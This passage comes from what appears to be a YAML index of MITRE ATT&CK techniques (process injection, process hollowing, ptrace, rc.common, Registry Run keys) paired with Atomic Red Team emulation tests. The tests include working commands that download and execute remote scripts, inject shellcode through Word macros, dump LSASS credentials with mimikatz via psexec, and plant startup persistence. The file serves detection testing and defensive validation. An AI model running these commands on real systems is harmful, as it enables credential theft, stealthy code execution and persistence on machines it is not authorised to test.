At this point the process can be - unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection - \ before being written to, realigned to the injected code, and resumed via - VirtualAllocEx, WriteProcessMemory, SetThreadContext, - then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: - Endgame Process Injection July 2017)\n\nThis is very similar to [Thread Local - Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new - process rather than targeting an existing process. This behavior will likely - not result in elevated privileges since the injected process was spawned from - (and thus inherits the security context) of the injecting process. However, - execution via process hollowing may also evade detection from security products - since the execution is masked under a legitimate process. " - id: attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:28:08.758Z' - created: '2020-01-14T17:21:54.470Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. 
Windows API calls - such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, - and those that can be used to modify memory within another process, such as - VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - identifier: T1055.012 - atomic_tests: - - name: Process Hollowing using PowerShell - auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c - description: | - This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. - Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) - supported_platforms: - - windows - input_arguments: - hollow_binary_path: - description: Path of the binary to hollow (executable that will run inside - the sponsor) - type: string - default: C:\Windows\System32\cmd.exe - parent_process_name: - description: Name of the parent process - type: string - default: explorer - sponsor_binary_path: - description: Path of the sponsor binary (executable that will host the binary) - type: string - default: C:\Windows\System32\notepad.exe - spawnto_process_name: - description: Name of the process to spawn - type: string - default: notepad - executor: - command: | - . 
$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 - $ppid=Get-Process #{parent_process_name} | select -expand id - Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose - cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction - Ignore - -' - name: powershell - - name: RunPE via VBA - auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b - description: 'This module executes notepad.exe from within the WINWORD.EXE process - -' - supported_platforms: - - windows - input_arguments: - ms_product: - description: Maldoc application Word - type: String - default: Word - dependency_executor_name: powershell - dependencies: - - description: 'Microsoft #{ms_product} must be installed - -' - prereq_command: | - try { - New-Object -COMObject "#{ms_product}.Application" | Out-Null - $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} - Stop-Process -Name $process - exit 0 - } catch { exit 1 } - get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} - manually to meet this requirement" - -' - executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" - -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" - -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" - name: powershell - T1055: - technique: - id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Injection - description: "Adversaries may inject code into processes in order to evade process-based - defenses as well as possibly elevate privileges. Process injection is a method - of executing arbitrary code in the address space of a separate live process. 
- Running code in the context of another process may allow access to the process's - memory, system/network resources, and possibly elevated privileges. Execution - via process injection may also evade detection from security products since - the execution is masked under a legitimate process. \n\nThere are many different - ways to inject code into a process, many of which abuse legitimate functionalities. - These implementations exist for every major OS but are typically platform - specific. \n\nMore sophisticated samples may perform multiple process injections - to segment modules and further evade detection, utilizing named pipes or other - inter-process communication (IPC) mechanisms as a communication channel. " - external_references: - - source_name: mitre-attack - external_id: T1055 - url: https://attack.mitre.org/techniques/T1055 - - external_id: CAPEC-640 - source_name: capec - url: https://capec.mitre.org/data/definitions/640.html - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: - Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved - December 20, 2017.' - source_name: ArtOfMemoryForensics - - url: https://www.gnu.org/software/acct/ - description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved - December 20, 2017. - source_name: GNU Acct - - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - - Chapter 7 - System Auditing. Retrieved December 20, 2017. 
- source_name: RHEL auditd - - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html - description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. - Retrieved December 20, 2017. - source_name: Chokepoint preload rootkits - - url: https://docs.microsoft.com/sysinternals/downloads/sysmon - description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved - December 13, 2017. - source_name: Microsoft Sysmon v6 May 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:28:45.651Z' - created: '2017-05-31T21:30:47.843Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, - QueueUserAPC/NtQueueApcThread, and those that can - be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017) - \n\nMonitor DLL/PE file events, specifically creation of these binary files - as well as the loading of DLLs into processes. Look for DLLs that are not - recognized or not normally loaded into a process. 
\n\nMonitoring for Linux - specific calls such as the ptrace system call should not generate large amounts - of data due to their specialized nature, and can be a very effective method - to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) - \ (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload - rootkits) \n\nMonitor for named pipe creation and connection events (Event - IDs 17 and 18) for possible indicators of infected processes with external - modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior - to determine if a process is performing actions it usually does not, such - as opening network connections, reading files, or other suspicious actions - that could relate to post-compromise behavior. " - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - API monitoring - - File monitoring - - DLL monitoring - - Process monitoring - - Named Pipes - x_mitre_contributors: - - Anastasios Pingios - - Christiaan Beek, @ChristiaanBeek - - Ryan Becwar - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false - identifier: T1055 - atomic_tests: - - name: Shellcode execution via VBA - auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 - description: | - This module injects shellcode into a newly created process and executes. By default the shellcode is created, - with Metasploit, for use on x86-64 Windows 10 machines. - - Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office - is required. 
- supported_platforms: - - windows - dependency_executor_name: powershell - dependencies: - - description: 'The 64-bit version of Microsoft Office must be installed - -' - prereq_command: | - try { - $wdApp = New-Object -COMObject "Word.Application" - $path = $wdApp.Path - Stop-Process -Name "winword" - if ($path.contains("(x86)")) { exit 1 } else { exit 0 } - } catch { exit 1 } - get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) - manually to meet this requirement" - -' - executor: - command: | - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) - Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" - name: powershell - - name: Remote Process Injection in LSASS via mimikatz - auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 - description: | - Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). - It must be executed in the context of a user who is privileged on remote `machine`. 
- - The effect of `/inject` is explained in - supported_platforms: - - windows - input_arguments: - machine: - description: machine to target (via psexec) - type: string - default: DC1 - mimikatz_path: - description: Mimikatz windows executable - type: path - default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" - psexec_path: - description: Path to PsExec - type: string - default: C:\PSTools\PsExec.exe - dependency_executor_name: powershell - dependencies: - - description: 'Mimikatz executor must exist on disk and at specified location - (#{mimikatz_path}) - -' - prereq_command: | - $mimikatz_path = cmd /c echo #{mimikatz_path} - if (Test-Path $mimikatz_path) {exit 0} else {exit 1} - get_prereq_command: | - $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" - Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force - New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null - Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force - - description: 'PsExec tool from Sysinternals must exist on disk at specified - location (#{psexec_path}) - -' - prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - -' - get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force - executor: - command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa - /inject /id:500" "exit" - -' - name: command_prompt - elevation_required: false - T1055.008: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.008 - url: https://attack.mitre.org/techniques/T1055/008 - - 
source_name: PTRACE man - url: http://man7.org/linux/man-pages/man2/ptrace.2.html - description: Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's - Manual. Retrieved February 21, 2020. - - source_name: Medium Ptrace JUL 2018 - url: https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be - description: Jain, S. (2018, July 25). Code injection in running process using - ptrace. Retrieved February 21, 2020. - - source_name: BH Linux Inject - url: https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf - description: Colgan, T. (2015, August 15). Linux-Inject. Retrieved February - 21, 2020. - - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: - Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved - December 20, 2017.' - source_name: ArtOfMemoryForensics - - url: https://www.gnu.org/software/acct/ - description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved - December 20, 2017. - source_name: GNU Acct - - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - - Chapter 7 - System Auditing. Retrieved December 20, 2017. - source_name: RHEL auditd - - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html - description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. - Retrieved December 20, 2017. - source_name: Chokepoint preload rootkits - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Ptrace System Calls - description: "Adversaries may inject malicious code into processes via ptrace - (process trace) system calls in order to evade process-based defenses as well - as possibly elevate privileges. 
Ptrace system call injection is a method of - executing arbitrary code in the address space of a separate live process. - \n\nPtrace system call injection involves attaching to and modifying a running - process. The ptrace system call enables a debugging process to observe and - control another process (and each individual thread), including changing memory - and register values.(Citation: PTRACE man) Ptrace system call injection is - commonly performed by writing arbitrary code into a running process (ex: malloc) - then invoking that memory with PTRACE_SETREGS to set the register - containing the next instruction to execute. Ptrace system call injection can - also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, - which copy data to a specific address in the target processes’ memory (ex: - the current address of the next instruction). (Citation: PTRACE man)(Citation: - Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible - targeting processes with high-privileges, and on some system those that are - non-child processes.(Citation: BH Linux Inject) \n\nRunning code in the context - of another process may allow access to the process's memory, system/network - resources, and possibly elevated privileges. Execution via ptrace system call - injection may also evade detection from security products since the execution - is masked under a legitimate process. 
" - id: attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:24:56.734Z' - created: '2020-01-14T01:33:19.065Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - System calls - - Process monitoring - x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system - call should not generate large amounts of data due to their specialized nature, - and can be a very effective method to detect some of the common process injection - methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: - RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process - behavior to determine if a process is performing actions it usually does not, - such as opening network connections, reading files, or other suspicious actions - that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - atomic_tests: [] - T1037.004: - technique: - id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 - description: |- - Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used. 
- - Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence) - name: Rc.common - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.004 - url: https://attack.mitre.org/techniques/T1037/004 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html - description: Apple. (2016, September 13). Startup Items. Retrieved July 11, - 2017. - source_name: Startup Items - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:46:20.433Z' - created: '2020-01-15T16:25:22.260Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'The /etc/rc.common file can be monitored to - detect changes from the company policy. Monitor process execution resulting - from the rc.common script for unusual or unknown applications or behavior. 
' - x_mitre_permissions_required: - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.004 - atomic_tests: - - name: rc.common - auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de - description: | - Modify rc.common - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) - supported_platforms: - - macos - executor: - command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello - World"'' >> /etc/rc.common - -' - elevation_required: true - name: bash - T1547.007: - technique: - created: '2020-01-24T18:15:06.641Z' - modified: '2020-01-24T19:51:37.795Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e - description: "Adversaries may modify plist files to automatically run an application - when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain - applications to be re-opened when a user logs into their machine after reboot. - While this is usually done via a Graphical User Interface (GUI) on an app-by-app - basis, there are property list files (plist) that contain this information - as well located at ~/Library/Preferences/com.apple.loginwindow.plist - and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. - \n\nAn adversary can modify one of these files directly to include a link - to their malicious executable to provide a persistence mechanism each time - the user reboots their machine (Citation: Methods of Mac Malware Persistence)." 
- name: Re-opened Applications - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.007 - url: https://attack.mitre.org/techniques/T1547/007 - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - x_mitre_detection: Monitoring the specific plist files associated with reopening - applications can indicate when an application has registered itself to be - reopened. - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.007 - atomic_tests: - - name: Re-Opened Applications - auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba - description: | - Plist Method - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - supported_platforms: - - macos - executor: - steps: | - 1. 
create a custom plist: - - ~/Library/Preferences/com.apple.loginwindow.plist - - or - - ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist - name: manual - - name: Re-Opened Applications - auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb - description: | - Mac Defaults - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - supported_platforms: - - macos - input_arguments: - script: - description: path to script - type: path - default: "/path/to/script" - executor: - command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - -' - cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook - -' - elevation_required: true - name: sh - T1547.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.001 - url: https://attack.mitre.org/techniques/T1547/001 - - external_id: CAPEC-270 - source_name: capec - url: https://capec.mitre.org/data/definitions/270.html - - url: http://msdn.microsoft.com/en-us/library/aa376977 - description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November - 12, 2014. - source_name: Microsoft Run Key - - source_name: Microsoft Wow6432Node 2018 - url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry - description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data - in the Registry. Retrieved August 3, 2020. - - source_name: Malwarebytes Wow6432Node 2016 - url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ - description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved - August 3, 2020. - - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key - description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry - Key. Retrieved June 29, 2018. 
- source_name: Microsoft RunOnceEx APR 2018 - - url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden - from Autoruns.exe. Retrieved June 29, 2018. - source_name: Oddvar Moe RunOnceEx Mar 2018 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Registry Run Keys / Startup Folder - description: |- - Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. - - Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. 
- - The following run keys are created by default on Windows systems: - - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce - - Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) - - The following Registry keys can be used to set startup folder items for persistence: - - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders - - The following Registry keys can control automatic startup of services during boot: - - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices - - Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: - - * 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - - The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. - - Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. - - By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. - - Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. 
- id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-08-03T16:30:26.918Z' - created: '2020-01-23T22:02:48.566Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. - - Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Windows Registry - - File monitoring - x_mitre_contributors: - - Oddvar Moe, @oddvarmoe - x_mitre_platforms: - - Windows - identifier: T1547.001 - atomic_tests: - - name: Reg Key Run - auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 - description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will - modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output - will be via stdout. 
\n" - supported_platforms: - - windows - input_arguments: - command_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.exe - executor: - command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V - "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - -' - cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" - /V "Atomic Red Team" /f >nul 2>&1 - -' - name: command_prompt - - name: Reg Key RunOnce - auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb - description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe - will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will - be via stdout. \n" - supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend - /v 1 /d "#{thing_to_execute}" - -' - cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend - /v 1 /f >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: PowerShell Registry RunOnce - auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 - description: | - RunOnce Key Persistence via PowerShell - Upon successful execution, a new entry will be added to the runonce item in the registry. 
- supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: powershell.exe - reg_key_path: - description: Path to registry key to update - type: Path - default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce - executor: - command: | - $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' - cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" - -Force -ErrorAction Ignore - -' - name: powershell - elevation_required: true - - name: Suspicious vbs file run from startup Folder - auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 - description: "vbs files can be placed in and ran from the startup folder to - maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will - be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start - Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted - and the user logs in.\n" - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" - Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" - cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" - cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Suspicious jse file run from startup Folder - auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 - description: "jse files can be placed in and ran from the startup folder to - maintain persistance.\nUpon execution, \"T1547.001 Hello, World 